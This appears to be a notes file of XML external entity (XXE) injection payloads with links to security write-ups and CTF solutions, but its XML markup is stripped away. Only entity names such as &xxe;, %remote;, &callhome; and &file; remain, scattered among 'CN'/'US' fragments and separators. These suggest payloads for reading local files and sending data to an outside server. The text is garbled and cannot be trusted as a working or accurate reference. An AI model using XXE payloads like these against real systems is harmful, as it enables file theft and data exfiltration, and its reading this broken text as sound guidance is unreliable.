]>
&xxe;
xml
]>
&xxe;
CN
US
%remote;%int;%trick;]>
">
]>
">]>
] [ "]>
]>
file.dtd:
">
on website:
%remote;%int;%trick;]>
https://jbz.team/midnightsunctfquals2019/Rubenscube
file.xml:
">
on website:
%remote;
%test;
%trick;
]>
&file
CN
US
random
CN
US
]>
%alpha;
%bravo;
]>
MAP
CN
US
%alpha;
]>
MAP
CN
US
">
-----------------------------------------------------------------------------------------------------------------------------------
%alpha;
%bravo;
]>
&charlie;
CN
US
">
https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection
https://r00thunt.com/2018/10/05/blind-xml-external-entities-out-of-band-channel-vulnerability-paypal-case-study/
https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/
-----------------------------------------------------------------------------------------------------------------------------------
test.dtd
">
%alpha;
%bravo;
%delta;
]>
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
">
%alpha;
%bravo;
%charlie;
%delta;
]>
CN
US
">
%bravo;
]>
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
step 1:
payloadallthethingsi
]>
&xxe;
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
step 2:
https://gist.github.com/staaldraad/01415b990939494879b4 - last comment
test.dtdi
">
%alpha;
%xxe;
]>
testing
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
]>
&callhome;
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
test4.dtd
">
%dtd;
%all;
%req;
]>
test
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
https://resources.infosecinstitute.com/finding-and-exploiting-xxe-xml-external-entities-injection/#gref
%dtd;
%all;
%req;
]>
test
CN
US
-----------------------------------------------------------------------------------------------------------------------------------
https://resources.infosecinstitute.com/finding-and-exploiting-xxe-xml-external-entities-injection/#gref
]>
&file;
CN
US